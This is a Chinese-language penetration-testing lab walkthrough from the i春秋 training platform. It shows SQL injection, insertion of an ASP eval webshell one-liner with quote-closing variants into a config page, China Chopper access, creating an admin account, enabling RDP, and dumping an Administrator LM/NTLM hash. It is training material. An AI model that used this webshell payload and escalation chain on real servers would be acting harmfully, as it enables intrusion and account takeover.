【i春秋综合渗透训练】我很简单,请不要欺负我
摸了几天的?了,主要是不知道该干嘛~~
CTF题目不想做,只想玩玩英雄联盟,玩玩渗透靶机这亚子!
个人觉得不能这样混下去了,于是又来到了i春秋,发现除了CTF还有综合渗透训练这个系列~~
个人感觉挺好玩的,啊哈哈哈哈,开始了~~
实验环境
操作机:Windows XP
目标机:windows server 2003
实验工具: 中国菜刀 PR 御剑 Pangolin 3389.exe
为了给您带来更加公平的场景体验,竞技类实验场景不包含实验指导
实验过程
首先进入环境,可以看见提示:
OK,直接打开攻击机的浏览器访问下www.test.ichunqiu
根据要求我们需要明确我们的思路,首先是要求拿到服务器权限,
我们可以通过进入后台,上传shell,然后提权,一通花里胡哨的操作
可以进行简单的信息收集,看是不是什么cms
同时还发现是ASP脚本,操作系统应该是windows的,数据库应该是access或者mssql吧
因为Asp一般和access mssql搭建
然后可以用御剑扫描一下看看目录:
一大堆东西,发现疑似后台目录,访问一波:
果然是的,接下来就是尝试登陆了,弱口令,sql注入,万能密码,默认密码等,,,
试试弱口令好像不行,不过发现验证码都不会变,爆破貌似也行
搜索一下魅力网络科技有限公司后台默认密码试试,emmm没找到
万能密码貌似也不行,,,,不想抓包了,顺便抱怨一句,这个环境是真的,,,
那就进入下一步吧,回到主页随便点开一个页面,发现有个id,试试注入:
发现:
直接上穿山甲吧,就是实验环境中提及的工具,使用方法就不必多说了,直接日
日出密码,去解密一下:
ok,去后台试试登陆,成功进入:
寻找上传shell的地方,上传上传没找到,备份文件备份没找到,,,,
后来找到一个网站设置的页面:
进行一句话插入试试<%eval request("1")%>
,发现:
ok,重新尝试一下进行闭合,发现页面进不去了,,,,
直接选择重做吧,,,,
试试:"%><%eval request("1")%><%
emmm,又出现错误:
再次初始化进行"%><%eval request("1")%><%'
成功,返回正常页面:
上传成功了,接下来就要知道在什么地方啊
首页没得,看来应该是在什么配置文件里面了,直接看看御剑扫出来的
发现一个目录inc/config.asp猜测是不是在这里呢,直接菜刀链接一波试试:
发现直接成功,,,,,:
接下来就是找到有写权限的目录,并上传工具:
涂掉的是没用的工具,添加用户:
将用户添加到系统管理员组:
利用工具开启3389端口(估摸着3389.bat没用):
在本机上cmd中输入mstsc,输入靶机ip,链接输入账号密码登陆成功:
继续,上传密码破解工具,,,试了很久,使用cain这个工具,其他看不见administrators的密码:
例如:
上传之后,在服务器上安装好并打开,切换到“Cracker”标签下,点击“LM & NTLM Hashers”,点击右边表格区域,在点击上面蓝色的加号:
在出现的窗口中选中“Include Password History Hashes”,点击“NEXT”
之后将结果export,用记事本打开,可以得到:
得到的是Administrators用户的登录密码HASH,还需要破解
62C4700EBB05958F3832C92FC614B7D1:4D478675344541AACCF6CF33E1DD9D85
WINDOWS密码HASH破解
登陆成功:
题目答案